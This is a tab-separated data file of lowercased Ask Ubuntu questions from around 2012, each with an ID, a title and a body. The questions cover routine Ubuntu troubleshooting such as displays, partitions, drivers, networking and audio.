189965	can not detect second display	using the display program i can not detect the second display which is connected with my desktop pc ( running ubuntu 11.10 64bit , gtx 280 gpu ) via dvi . although using a live cd of linux mint the second screen was used when it loaded , without me having to set anything else . what can i do ? thank you for your time !
189968	is their a relational algebra software for ubuntu ?	i am looking for a program that deals with relational algebra on relations and relationships .
189973	what is the largest possible size of a root partition ?	i know that using a boot-able partition over 123 gb is not good but what is the max root size allowable ? is there a limit ?
189979	open web browser in background	to open a web browser , i currently use xdg-open inside a python app . however the web browser steals focus . the python webbrowser module is unreliable so how could i use xdg-open without the browser stealing focus ? thanks
189987	get device with mount point	there 's a way to get the device name ( /dev/sdx ) with the mounted folder ? i mean , get the assosiated device in a mount point using the mounted folder as the reference , or make a python dictionary with the mount points : devices ... i know that mount -l can get me the mounted file system info , but i do n't really know how to strip it to make the dictionary ... any help ? regards ...
189989	natty narwhal slowed my operating speed way down	i 'm using a toshiba satellite w/ a genuineintel t1350 @ 1.86ghz & 72gb hd - running lucid lynx & runs great ; tried to upgrade to natty narwhal , but slowed operating speed so much , reinstalled natty ( 10.04 ) again . 12.04 is listed to need only 512mb and 2gb processor - will 12.04 run smoothly on my ancient laptop ? any experiences/advice out there ? thanks .
189993	how do i encrypt a dual boot system ?	i have a dual-boot laptop with four partitions - windows , swap , ubuntu ( os ) andubuntu /home . i need to do full disk encryption on it . ubuntu is running 12.04 , windows is windows 7 home premium .
190004	how to uninstall virtualbox in 12.04 ?	can anyone help me removed virtualbox ? by the way , i could n't install some softwares , is it because it is a 64-bit version ?
190006	paste option with right mouse button not working	i am using ubuntu 12.04 . when i am trying to copy-paste with my mouse , i can copy but i ca n't paste . the paste option is showing disabled ( the usual gray colour ) . however ctrl+c and ctrl+v is working fine . can somebody help me ?
190008	terminal insert a b c d on shift+arrows . solution ?	i 'm new to ubuntu and i do n't know how i did it , but now when i try to select a text with shift+ [ left/right ] arrow keys , it inserts me `` d c '' ( letters ) . i look up on google for an hour and i have n't found anything really to help me . i have installed ubuntu with wubi and i 'm speaking about ctrl+alt+t terminal .
190009	system hangs on video playing	whenever i start playing a video on my ubunt10.10 on players like vlc or totem the whole system hangs abruptly and mouse and keyboard are become unresponsive but audio still plays . can any one please help me.. thanks ...
190015	boot menu start up os selection issue	after installing 12.04 and restarting the laptop , i kept getting a blank screen . then i tried to un-install ubuntu by easybcd method . when i went into disk management , there was no partition created . now when i start my laptop , i get the option to select windows and ubuntu and when i click on ubuntu , it says the .mbr file is not there . then i tried to install it again and now on start up , while selecting the os , i get windows and ubuntu twice . please help . i am new to ubuntu and need it for my college and learning c and that is why trying it out .
190016	nagios suddenly stops working	i have configure passive checks on one my host system for this i am using nsca . it was running fine . suddenly host is showing down on the monitoring . but host was fine and running when i check the logs on the host showing [ 1347941895 ] warning : attempting to execute the command `` /submit_check_result host.example.com 'current load ' ok 'ok - load average : 0.69 , 0.53 , 0.42 ' '' resulted in a return code of 127 . make sure the script or binary you are trying to execute actually exists ... i restarted nagios services many times but still it is showing the same error . can anyone help me regarding this . thanks in advance..
190022	can i get the classic `` run command '' window	i love unity but i hate it when alt+f2 brings up the dash . is it possible to just remap alt+f2 so that the thing looks like exactly the old alt+f2 i know what i want is like going back in time but i really loved that fast command runner in old gnome . i can bring up terminal using ctrl+alt+t and run anything i want but it sometimes is a overkill to bring up something like that for small things . and i used to like the fact that older window was fast , had autofill and would disappear after launching the command . or is there a utilty that looks somewhat like that and can be installed and mapped to some key .
190024	can i reformat a windows pc hard drive and install the ubuntu operating system	my daughter gave me her old pc , and i reformatted the hard drive with my own xp system disk . however , if i donât activate the license , which i canât , it will self-destruct within 30 days . if i download the ubuntu software , can i burn it on a cd and re-format the hard drive , and also install the ubuntu operating system on the hard drive ? will that cd have accessory software applications included , e.g . a word processor , a spreadsheet , a video player , video editor , photo application , etc. , as indicated on your website ? if i ca n't get internet access on the ubuntu pc would i be able to download some freebie applications such as irfanview and openoffice on my other ( windows ) pc , and transfer the download files to the ubuntu machine , and install them ?
190028	used memory in linux ?	i see in system monitor , used memory only 332mb , so free memory is ~3.4gb , but when i use command line : free -m , used memory is 1gb , free memory only 2.8gb . i use command line : cat /proc/meminfo - > result same free -m. why ? who can help me ?
190029	installing a .cer file	i have a cert.cer certificate file for my mozilla firefox . i do n't have any clue how to go about installing it for my system . any guidance would be of great help .
190030	formatting a drive to fat32 with mkdosfs , need some info	i 'd like to know how can i specify the cluster size when using mkdosfs /dev/sdx -f 32 , some where i read that if you want to format it with 32kb cluster size this is the command : mkdosfs /dev/sdx -s 64 -f 32 -i but what if i want to format it with 64kb cluster size , how can i do it ? can someone explain the proper usage of mkdosfs /dev/sdx -s xx in plain words ( no native english speaker ) ?
190037	kubuntu freezes after leaving on login screen	sometimes after i logout ( ctrl+alt+l ) and leave my pc for a night i ca n't wake it up next day . it is happening randomly like 1-2 times per week . in the morning the screen is black and input from keyboard/mouse do n't work ( shortcuts like ctrl-alt-del or with f1 donât work too ) so i have to restart system manually . any idea how to prevent it ? ( i use updated kubuntu , doing updates ever time new is released )
190042	show the target of current directory ( symbolic link )	i 'm in directory ~/a which is a symbolic link to ~/b/c . my prompt looks like : ~/a $ but i hope to cd to ~/b/c . ~/a $ cd . ~/a $ it does n't work . what 's the right way ?
190049	what is the best external hard-drive compatible with ubuntu ?	i am planning to buy an external hard-drive to backup my critical data . i was wondering if i could get it from ubuntu shop : - any ideas which external hard-drives are compatible with ubuntu .
190056	problem installing dotnet framework with winetricks	i use xubuntu 12.04 . first of all , i installed version 1.4 of wine . when i entered in console sudo sh winetricks dotnet40 to install .net framework 4.0 , i got the following error : wine cmd.exe / c echo ' % programfiles % ' returned empty string i can not do anything with winetricks and the dotnet framework is not installed . i get this error when i try to install other programs as well in wine . previously , everything was fine . should i try wine 1.5 or stick to the stable version ? i need to install dotnet framework 4.0 . how can i get rid of the above error and successfully install the files ?
190057	ubuntu partition wo n't display on screen	i installed ggobi on my macbook pro , and it was n't working right . i looked up some information , and found this site : gtk warning : can not open display i followed the vague instructions , but i think i just typed export display=:0 directly into my terminal ( i 'm still in my mac partition at this point ) . fast forward a few days , and i try to go into my ubuntu partition . it only gives me command line options . i remember my reckless input from a few days back , and i 'm certain that it is the issue . my problem is that i have no idea how to get my previous display settings back . my mac partition seems unaffected , but it 'd be nice to get back into my ubuntu partition . my last resort is completely reverting my computer to my most recent backup before i changed it , but if anyone out there knows how to fix this , i 'd greatly appreciate it . thanks in advance .
190058	hp notebook pavilion g6-2101sl freeze	i just bought this notebook and i 've already installed in a new partition ubuntu 12.04 lts with 6gb of swap memory . update2 : this is the laptop configuration : http : //h10025.www1.hp.com/ewfrf/wc/document ? cc=it & lc=it & dlc=it & tmp_geoloc=true & docname=c03397517 sometimes ( without any special conditions ) ubuntu freezes . my mouse is blocked , the ui is blocked , alt+f1 to kill something or to restart is blocked , i ca n't really do anything ... i 've also tried and it freezes with : ubuntu 3d ubuntu 2d gnome shell and it freezes both with low and high load . i can only press the power button ( physically ) and restart my laptop ( and this is not the correct way to do things ) . i 'm using this laptop for work , so i need a stable os without this freeze . someone knows how to solve this problem ? update : /var/log/messages is empty /var/log/kernel.log - > http : //paste.ubuntu.com/1220182/ /var/log/xorg.0.log - > http : //paste.ubuntu.com/1220186/ i just installed the proprietary driver from ati , but it crashes anyway . this morning i started the laptop , i enabled wireless , opened dropbox and chrome - > freeze . when it freezes i can not : do ctrl+alt+f1 to get console access alt+f2 + r to reload session alt+print screen + resub to restart it is totally frozen .
190059	how to change digikam icon	i installed digikam . it is great program but i do not like the icon : ) . can anybody help me how can it be changed or replaced or whatever for the nicer icon ? thank you all in advance .
190061	why ca n't i use the hud with libreoffice in ubuntu 12.10 ?	i 'm using ubuntu 12.10 with the latest updates installed , and the global menu works in libreoffice , even if it is a bit buggy . however , i can not use the hud with libreoffice . no matter what i search for , it only finds the menu entries from the indicators . i also tried lo-menubar , that i think was n't as buggy as the standard implementation of the global menu , but it does n't work with the hud either . in every other application , the hud works fine . where does this come from ?
190062	eclipse colour scheme is terrible in ubuntu	i have modified my eclipse colour theme to my liking but just cant seem to develop in peace because i keep having to squint and stare at the screen for certain elements . the colour default scheme is simply pathetic ! i have no idea what these elements are called and hence instead of attempting to describe them i have attached screenshots . how can i modify these elements to make them more humanly readable ?
190064	how do i copy files from windows partition to my ubuntu partition	i am dual-booting windows 7 and ubuntu and i have many important files on my windows os . i 've been trying to copy the files from windows to my ubuntu home directory but the paste option is disabled when i rt click in my home dir . how can i copy the files ? what is the command to copy files from my d drive if using console with sudo ?
190073	fstab missing on ubuntu 12.04.1	i just installed ubuntu 12.04.1 and there is no /etc/fstab this must be new in 12.04.1 because i was running 12.04 months ago and it was there . i did n't do an upgrade i did a clean install . where has this file moved to ? i use it to automount my windows partition and to bind folders within that partition to ubuntu
190074	disabling keyboard '\ ' key autotype and fixing	i 've dell latitude d620 laptop , with backtrack installed . for the fast few days , it 's automatically typing the \ automatically without any break . i tried to break it by ctrl+c . however it pauses for a few seconds and continues in next line . i ca n't even login to system because of the issue . i believe it ca n't be a malware problem . any possible solutions ?
190081	notifications mode is missing in artha dictionary !	i have already installed notify-osd package on ubuntu 12.04 . this is what it says in /.config/artha.conf : [ settings ] version=1.0.2 accel_key=65471 accel_mods=0 accel_flags=68 detailedmode=false notifications=true this is the artha dictionary i have : please help . thanks ... !
190083	how to reset ld_preload	i 've done the following command to set the path for ld_preload . but it 's the wrong path . export ld_preload=/home/ does anyone know what is the default path for ld_preload on ubuntu 12.04 ? what is the exact command to reset the export ?
190088	is there a terminal command to split a folder in two ?	i have a folder with 80.000 files on my imac g5 running ubuntu 12.04.1 and i ca n't even open it with nautilus because it freezes . i can do ls -a in terminal and it shows me everything . is there a terminal command i could use to split it in two equal folders so it would be easier for nautilus to open one of them ? or maybe 4 folders ?
190089	installing fastcgi mono for running asp.net on nginx	i am a novice at ubuntu and i 've been given the task of installing and configuring nginx to run asp.net applications . this is probably a stupid question but i 'm using this tutorial as a starting guide and i 'm stuck with where i have to set a socket with this command : fastcgi-mono-server4 /applications=/ : /var/www/www.domain1.xyz/ /socket=tcp:127.0.0.1:9000 what path am i supposed to replace /var/www/www.domain1.xyz/ with ? if i run the command as is i get this error : error creating the socket : address already in use root @ ubuntu : ~ # kill 9000 ; please help .
190092	how to stack open windows side by side	windows explorer = nautilus like in windows os u can stack explorers side by side vertically and horizontally , can the same be done in ubuntu 12.04 ? ? ?
190094	problem booting node with pxe ubuntu maas	i 'm having problem with adding nodes in ubuntu maas , it boots when i 'm adding it in web interface but when the node boots it does n't boot any pxe files or find the master computer . pxe-e76 : bad or missing multicast discovery address pxe-m0f : exiting hp pxe room
190096	is there a program which allow easily to add speech bubbles to a video/screen cast ?	i am currently creating a screencast tutorial for a lecture . therefore i use recordmydesktop to get a video of my actions . now i want to annotate some actions in the video with speech bubbles ( or some thing similar ) because the videos should be without sound . is the a good linux/opensource video editor which provides such a feature ?
190097	what version was installed ? x64 or i686 ? what 's the difference exactly ?	okay , so heres my problem . i recently started migrating several services to individual vms on my box , using virtualbox 4.1 . i created a new virtualbox vm with guest type `` ubuntu ( 64 bit ) '' . i 've already done this before and it worked like a charm . i then installed unbutu server ( 12.04 ) from the exact same dvd image . all the time i thought that it should have installed x64 . i already put a few hours work into the new vm , migrating the webserver and mail system etc . today i tried installing a x64 piece of software and it suddenly told me that it needed x64 and i had only i686 . i checked uname -a and this is what it gave me : linux hostname 3.2.0-29-generic-pae # 46-ubuntu smp fri jul 27 17:25:43 utc 2012 i686 i686 i386 gnu/linux any guesses what went wrong ? all the time i was thinking i had a x64 system . any way to move to a `` real '' x64 ? i have a second vm on this host which is running x64 just fine .. p.s . : grep -- color=always -iw lm /proc/cpuinfo returns lm among the flags .
190098	please help me in installing ubuntu 12.04.1. and can it run ms off . prof. plus 2007 ?	i want to install ubuntu with ms office professional plus 2007 running . i want to format my hard drive with slow speed as it happens when we install xp . the all cleaning with no traces left . for that what 'll be easy to do : 1 ) formatting entire hard drive or 2 ) formatting only that partition on which i want to install ubuntu ? i should be sure that i can run ms office professional plus 2007 on ubuntu . i have ubuntu-12.04.1-desktop-i386.iso burned on a cd and have ms office prof. plus 2007 in this form - http : //i.imgur.com/qahp8.jpg i also want to know when i update ubuntu how much mb will it be ?
190103	is the tap-to-click issue solved	i 'm just an average joe when it comes to computing ( maybe less then the average joe ) but i hate tap-to-click . in system and settings there is no touchpad tab ? is it true that this has been fixed ? i 'm using dell inspiron n5110 xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] this is really strange because dell is one of the top manufacturers in laptops and ubuntu one of the top distros in linux and canonical claims that they are working closely with dell .
190105	i can only receive file using bluetooth in xubuntu	i have installed xubuntu 12.04.1 on my machine . i can only receive file using bluetooth from my cellphone and i can not send file from my machine to cellphone ( with send file to device action in bluetooth applet ) , it starts sending but after some minute it says that `` request timeout , error occurred while sending file 1.jpg '' . i don not know why ? thanks .
190107	nessus 5 installation not working	i downloaded the ubuntu 11.10 / ubuntu 12.04 ( 64 bits ) : nessus-5.0.1-ubuntu1110_amd64.deb ( 25298 kb ) from the following page : - http : //www.tenable.com/products/nessus/select-your-operating-system opened up the file using ubuntu software centre and clicked on the install button on it 's right . it prompted for a password . i entered the password and the installation began . after the installation was completed , the install button appeared again . tried to search the nessus in dashboard home , but no success . help on this please !
190110	can command line arguments be masked or hidden instead of appearing in the process list ?	i have written a command line application in c++ that is used to access an online user account via a soap api . in order to avoid having any login details written to file anywhere on my machine for security purposes , i decided to write the application as taking the username and passwords as command line arguments . i then found that upon running a ps -aux command that those sensitive arguments are actually visible in the process list . is there anyway that these can be masked ? i am probably being overly sensitive about the security aspects here but i would like to avoid this data being accessible in any way . if not , are there any other options available other than using encryption algorithms to decrypt this data from a file or passing in encrypted command line arguments ?
190111	why is user `` lightdm '' trying to log into my sbs 2003 ?	i have 7 ubuntu desktops connected to a sbs 2003 using centrify . i have a rather weird scenario , whereby a user with the name lightdm is trying to log into our server , possibly automatically . i thought lightdm was the session manager , not a user ? does anybody know what could be causing this ? there is no user : `` lightdm '' on the server and the problem only comes from one of the 7 internal desktops connected to the server ( its ip address is in the local network ) .
190112	how do i retrieve deleted bookmarks in chromium ?	using chromium on two computers . one ubuntu precise the other windows xp . bookmarks deleted on the xp and only realised it also affected my personal laptop with ubuntu . how do i retrieve my bookmarks in chromium on my ubuntu laptop ?
190114	playonlinux equivalent for windows	like the playonlinux do we have a similar application in windows that allows us to run a ubuntu application on windows os . or is there any simulator to run the ubuntu terminal in windows ( for learning purpose ) .
190124	windows browsers in ubuntu for web developent	i regularly do front end development ( html , css , js ) and need to test websites for ie7 , ie8 , ie9 , firefox , chrome , safari , opera in windows.i would like to move to ubuntu , but am concerned that testing websites might get very difficult.do i have any options besides having windows as virtual machine ?
190125	will gnome 3.6 be backported to 12.04	is there any chance that gnome 3.6 or some of its components be backported to ubuntu 12.04 ? or should i upgrade to 12.10 to get gnome 3.6 ?
190130	sony bravia unsupported signal after turning off display	installed 12.04 over a previous hackintosh build a couple days ago and trying to iron out all the kinks . the most frustrating right now is my hdtv output through hdmi to a sony bravia kdl-40bx421 . the output through hdmi works when i start up . however most times when i turn off the display and turn it back on i get a `` unsupported device , please check your device output '' error on the tv . unplugging the hdmi cable from the back of the computer resets the problem . my mb is a z68m-d2h and i 'm running an i3-2105 with hd3000 graphics . if i run xrandr and turn the other outputs off , the problem seems to happen less but it still occurs . here is the output for xrandr : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 1600mm x 900mm 1920x1080 60.0*+ 1280x720 60.0 640x480 60.0 dp2 disconnected ( normal left inverted right x axis y axis ) i really appreciate any help on this thanks .
190131	is there a way to get a list of my favourite programs so i do n't have to 'store ' them in in my vertical dock ? ?	that way i can have my running programs in the vertical dock not mixed in with my favourite programs . i should n't have to write my favourite programs down on a piece of paper in order to avoid a cluttered vertical dock .
190132	ca n't make bootable usb for release 12.04.1	i 'm trying to make a bootable usb drive for ubuntu 12.04.1 . the usb drive created by unetbootin does n't boot ; it results in a disk i/o error message . in trying to create a bootable usb drive , pendrivelinux installer reports a syntax error in syslinux and then says that the drive will not be bootable . and it is n't . it produces the same `` disk i/o error '' message . is there some way around this or a fix for it ? thank all of you for your help . the error i kept getting was this : an error ( 1 ) occurred while executing syslinux . your usb drive wo n't be bootable ... after googling around to find out what error ( 1 ) was , i moved from my crufty old xp machine to a newer , cleaner windows 7 machine , and guess what ? pendrivelinux created a bootable usb drive on the first try . i am happy now . : - )
190133	what are the alternatives for remastersys ? !	i need an alternative software of remastersys since it 's not working in my system ( ubuntu 12.04 ) i want software just like remastersys i mean i dont want to install any new packages i just want a software that makes an iso of my current system without any added package .
190140	do .deb installed apps get updates ?	so this might be very silly question for users , but i am quite new to ubuntu and want to know this . do .deb installed apps get updates ? for example : i have opera installed with using .deb will it get updates like software that are installed using ppa ? i would gladly accept your answers if you will explain this as well : as you can see .deb installed skype added it 's self to software source so will it or will it not get updates ? thank you for your time .
190146	no sound after suspend/resume	i have no audio on lubuntu 12.04 after resuming from suspend . i tried sudo alsa force-reload to no avail . sound works after reboot . please help .
190149	how do you tell apt to use files in /etc/apt/sources.list.d	i added a repo by putting a file in /etc/apt/sources.list.d and then i did an apt-get update . however it did n't do anything with that repo . i then noticed that it did n't appear to be including any of the repos in that directory . only stuff in /etc/apt/sources.list seem to be noticed by apt-get . all the files in the directory end in .list and contain something like : virtualbox.list deb http : //download.virtualbox.org/virtualbox/debian oneiric contrib pj-assis-ppa-oneiric.list deb http : //ppa.launchpad.net/pj-assis/ppa/ubuntu oneiric main deb-src http : //ppa.launchpad.net/pj-assis/ppa/ubuntu oneiric main do i need to put some sort of include statement in /etc/apt/sources.list ? i 'm using kubuntu 11.10 .
190151	huawei e153 and ubuntu ultimate 10.04.1	i 'm currently using ubuntu ultimate 10.04 . the problem is that the huawei e173 modem is detected as a usb drive instead of a modem . i have tried to download usb mode-switch but it is not installable as it has a usb-modeswitch-1.2.4.tar.bz2 extension . can someone please tell me how to connect my modem . am using the windows side to get to the internet . thanks in advance .
190170	how to change launcher icon	is there a way to customize a lucid lynx launcher icon for various programs ? there does not seem to be a way to do this using create launcher or launcher properties . the application is not actually `` installed '' on the pc , the executable has just been copied . all i 've been able to do so far is to add the command /home/t32/bin/pc_linux/t32marm -c /home/t32/config_usb.t32 to a generic launcher icon using create launcher .
190173	how to execute a executable with sudo ?	i have an executable file but do n't know what type or format it is . when i execute like this $ chmod +x xfile $ ./xfile it shows permission denied when i run as super user $ sudo ./xfile it shows sudo : ./xfile : command not found i am new to linux please tell me how to execute it .
190174	pinging/connecting to server.domain.local never works , but server does when the search domain is specified	this is a bit of a weird one . i 'm running ubuntu on a windows domain . if i type `` ping server '' i can ping correctly and i can connect without any problems . it looks up my search domain ( domain.local ) and everything is hunky dory . problem is when i try to ping server.domain.local . it just ca n't look up the server and comes back with `` ping : unknown host server.domain.local '' part of me thinks that the name servers are n't set correctly , but i wonder if there is something i can do to get around it .
190176	permanently set file and folder permission for a user	i just got hold of a linux machine running ubuntu from my friend . it places 644 permission on all new files created by a user . but for some purposes i want 755 permission on all files and folder created by that user , i have been searching on internet from all day long but did not got hold of any useful resources plus i am a beginner to linux system as well .
190178	no mention of arm versions of lubuntu .. on the main website ?	just a question for the lubuntu team really - i am a huge fan of lubuntu - thank you and congratulations on creating a great distribution . i am just surprised to notice that , the main website does n't mention that there are arm versions - or provide any links to download . is that because they are 'unofficial ' in some sense ? i am running lubuntu 11.10 on an allwinner a10 device ( the mk802 ) and it works a treat . do n't `` hide your light '' guys - tell the world lubuntu is a cracking os for arm systems .
190184	ubuntu 12.04 - can not remove fglrx	i want to use the open source radeon driver for ubuntu , but currently i 'm using fglrx . so , i went ahead and purged fglrx using sudo apt-get remove -- purge fglrx* and when i rebooted and ran sudo lshw -c video , i still see driver=fglrx_pci . i 've followed the instructions here . i 'm not sure why i ca n't completely purge fglrx , is anyone else experiencing this ? i also checked synaptic package manager and additional drivers and it says i 'm not using fglrx at all . i 'm not sure if i 'm really using fglrx now . have anyone else encountered this ? thanks .
190186	ubuntu factor for android	time already come to change my cellphone , so i want to buy one that is fully compatible with ubuntu for android , so i saw a lot of videos about milestone , droid razr , and others that support ubuntu for android . my question is which cellphones support ubuntu and which one is more stable ? for example i saw this implementation : http : //www.youtube.com/watch ? v=ayefcldavtk & feature=related and also , there are native ones on development like this : http : //www.youtube.com/watch ? v=gd43m08d-ro
190190	audio not working properly	i 've been using my current ubuntu installation for several months . however yesterday i noticed that the audio was not working properly . whenever i play a video on youtube , the sound keeps breaking off intermittently . sometimes is plays out of sync with the video and sometimes at twice the normal speed . at first i thought it was a browser problem but i noticed the same symptoms when playing a file in vlc media player . this is the result of sudo aplay -l : ** list of playback hardware devices ** card 0 : intel [ hda intel ] , device 0 : alc268 analog [ alc268 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i 've checked all the drivers and packages and they 're all fine and restarted more than a 100 times ( literally ! ) . what could be the problem ?
190193	which command can be used to configure a router to reject the address for example 192.168.100.0/24 network using the route command ?	which command can be used to configure a router to reject the address for example 192.168.100.0/24 network using the route command
190194	how can i view an x window from a remote system on their local system ?	what shall i do to show my remote x window on my local system ? from the local system : export display=local:0.0 or from the remote system : export display=local:0.0 or from the local system : export display=remote:0.0 or from the remote system : export display=remote:0.0
190195	t430 wireless issues	i just got a new thinkpad t430 and i 'm having some wifi issues . i 'm able to connect ( in both windows and ubuntu ) to mine and other people 's personal wifi networks . in windows i 'm able to connect to public wifi networks , but not in ubuntu ( i can usually temporarily get a connection but in a couple of minutes the connection will stop working ) . how should i go about debugging this ? if it helps , my lspci : http : //paste.ubuntu.com/1204994/ and my lsmod : http : //paste.ubuntu.com/1204993/
190197	ubuntu 12.04 mysql 5.5 myodbc 5.1 or 3.1 query hangs	i have been able to install ubuntu 12.04 with lamp mysql version 5.5.x it works fine within linux , it allows me to connect from myodbc windows vista or windows 7 i have configured networking access and have been able to access from windows vista using putty and other tcp connections like mysql query browser . i have also configured or disabled ufw firewall and apparmor . the connection works fine until i query data from the tables . it lets me query small amounts of data like : select name from users limit 20 but if i do a select * from users , it goes on a never-ending loop . this happens even on tables with very few records like 5 or even less . the problems occur with windows because i tried ssh from linux mint and it worked fine . i need to be able to work using myodbc either 3.51 or 5.1 since my client program is made in vb6 and connects to mysql server via tcp/ip . the server is an hp proliant ml350g6 with intel xeon 64 bits . i tried several ubuntu server version ( 12.04 64bit , 10.10 64bit , 11.04 32bit ) and none has worked i even tried centos 6.3 and the same . as a reference , it works fine with onother ubuntu server version 6.x on hp proliant 150 and mysql 5.0.x that is like 7 years old and never updated . help please .
190200	preseeding : ca n't access cdrom ?	at work we often need to install ubuntu server and several extra packages while offline . to make this faster , i 'm creating a custom ubuntu server install via preseeding ( following this documentation : https : //help.ubuntu.com/community/installcdcustomization ) . installing extra packages was easy and works well . in addition to adding a few packages , i would like to add another repository to the default set . this is where it seems to get tricky . remember that , at install time , these computers are offline . however , i need to add an online repository to the list along with adding its key . adding the repo to the list is easy with d-i apt-setup/local0/repository string < repo url > but the key needs to be added offline . so i downloaded the key and added it to the iso ( i made a new `` keys '' directory ) , thinking that i should be able to access it like the isolinux/txt.cfg file ( specifically , the `` append file=/cdrom/preseed ... '' bit ) but i ca n't seem to be able to access /cdrom from the preseed file . the simplest test is a late_command : d-i preseed/late_command string df > /target/home/df.txt ; ls -rl /cdrom > /target/home/cdrom.txt ; ls -rl /target/media/cdrom > /target/home/target_cdrom.txt [ /code ] the server install tells me the above command exits with error code -1 , and the only file out of those three that contains anything is the df , which looks like this : filesystem 1k-blocks used available use % mounted on none 205182 180 204992 0 % /run devtmpfs 1020212 8 1020204 0 % /dev /dev/sr0 1408470 1408470 0 100 % /cdrom /dev/mapper/ubuntu-root 18540428 3541660 14068568 20 % /target /dev/sda1 233191 24991 195759 11 % /target/boot /dev/mapper/ubuntu-root 18540428 3541660 14068568 20 % /dev/.static/dev devtmpfs 1020212 8 1020204 0 % /target/dev /dev/sr0 1408470 1408470 0 100 % /target/media/cdrom so obviously both /cdrom and /target/media/cdrom exist . why ca n't i read them from the preseed file ? is the iso actually mounted there as in isolinux/txt.cfg ? is there any other way to add this key without needing to download it like the following ? d-i apt-setup/local0/key string < remote repo key url > thank you for your help .
190201	no wired and wireless connection found after upgrading 12.04	after upgrading 12.04 lts , my wired connection works but no wireless connection found . i tried many suggestion for wireless connection on ubuntu forum but nothing works for me . now , maybe by mistake , i am also unable to connect internet through wired connection . now , ( 1 ) its says `` no network devices available '' and ( 2 ) in system settings â hardware â no additional driver icon is showing please help . i do n't know much about ubuntu .
190202	difference between `` halt '' and `` shutdown now '' ?	ubuntu one remote uses sudo -s -p '' halt for shutdown and does not work to the end . leaveing monitor on with message will now halt [ 22225.11163 ] halted what is the difference between sudo -s -p `` halt and sudo shutdown now ?
190220	is there an imac brightness gadget/widget ?	so i 'm running ubuntu 12.04.1 on an imac g5 with powerpc architecture . i know there 's this thing called fblevel that can adjust screen brightness , but i do n't really know how to use it , and i really hate starting at the terminal all day long . is there a slider that one can install for this ? thanks !
190221	difference between sudo rm -rf and rm -vf ?	recently i have seen one issue with a cache problem . the problem comes with broken hash and that could be fixed with sudo rm -rf /var/lib/apt/lists/* and sudo rm /var/lib/apt/lists/* -vf but i am not understanding the difference between these two . can somebody explain the difference ?
190224	how to display lyrics that are stored in mp3-tag ?	how can i achieve that goal ? i tried many players - banshee , rhythmbox , amarok , exaile ... none of them displays lyrics that are already stored in the mp3 . they always try to fetch lyrics from the internet . interestingly , banshee supports storing lyrics into the mp3 but not reading - i find that annoying ... one player though does it properly - gmusicbrowser . but this piece of software has a so confusing user interface - i do n't wan na use it . any ideas ?
190225	how do i remove the mail icon only in ubuntu 12.04 ?	so , i only want to remove the mail icon , nothing else form my gnome bar ( i do n't like unity ) . how do i do that ? running ubuntu 12.04 on a g5 imac with powerpc architecture .
190227	is there a way to show icons on a git repo folder like tortoisegit ?	is there a way which could let me know all the file status by just looking at the folder view , like what tortoisehg , tortoisesvn , tortoisegit did on windows ? now my git repo folder looks the same as other folders . if i want to view file status i have to type git status in the command line . i want some icons which could inform me the file/folder status at my first glance on the folder view . i 'm using ubuntu 12.04 edit i googled it , and what i 'm asking for is called the overlay icon .
190235	slight stuttering when moving windows in fresh 12.04 install	installed ubuntu 12.04 today and my problem is that when i 'm moving the windows around my screen it does n't feel smooth at all . usually i can fix this by changing the refresh rate to 60hz , but this time it does n't help . my graphics card is a nvidia gtx 560ti and i 've tried both the 295.40 , 295.45 and 304.43 ( which i 'm currently using ) but neither has resolved my problem . i searched around a bit and tried changing the refresh-rate using compizconfig-settings-manager and xrandr . no change using ccsm , but when i tried xrandr i got this reply : konsolkongen @ konsolkongen-desktop : ~ $ xrandr -r 60rate 60.0 hz not available for this size - which is nonsense of course . this is what my xorg.conf file looks like : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 560 ti '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : 1680x1050_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection any help would be greatly appreciated , my obsession with video quality ca n't stand stuttering like this . for what it 's worth though , i do n't have any screen tearing , so at least v-sync is on . thanks .
190238	grub ca n't access my linux partition ?	until now i had 2 ntfs partitions on my harddrive . now i wanted to install ubuntu 12.04 , so i freed 100gb from the end of my harddrive , created a new ext4 partition , and installed ubuntu 12.04 on it . that 's how my partitions table look : /dev/sda1 - 98.81gb ntfs /dev/sda5 - 732.71gb ntfs /dev/sda6 - 100.00gb ext4 the grub has written the data to the harddrive 's mbr , however it seems that it ca n't access the /dev/sda6/ partition . it boots up to resuce mode , and when i type ls i can only see ( hd0 ) and ( hd0 , ms-dos ) . is it because the boot files are on an extended partition ? if so , how can i make it a primary partition without reformatting my harddrive ? if grub support extended partitions , where am i wrong ? thanks .
190239	how to access hard drive files from livecd ?	i do n't know what files or file types are there on the hard drive nor do i know the file system in which the hard disk is written on . i am not able to view it in the home folder after booting from the livecd .
190242	how enable skype spell checking ?	is there a way to have spell checking enabled in skype ?
190244	windows 8 partition mounting	how can i browse windows 8 system files with ubuntu ? whenever i try to access it it says error 14 and does not let me browse the files like in windows 7 .
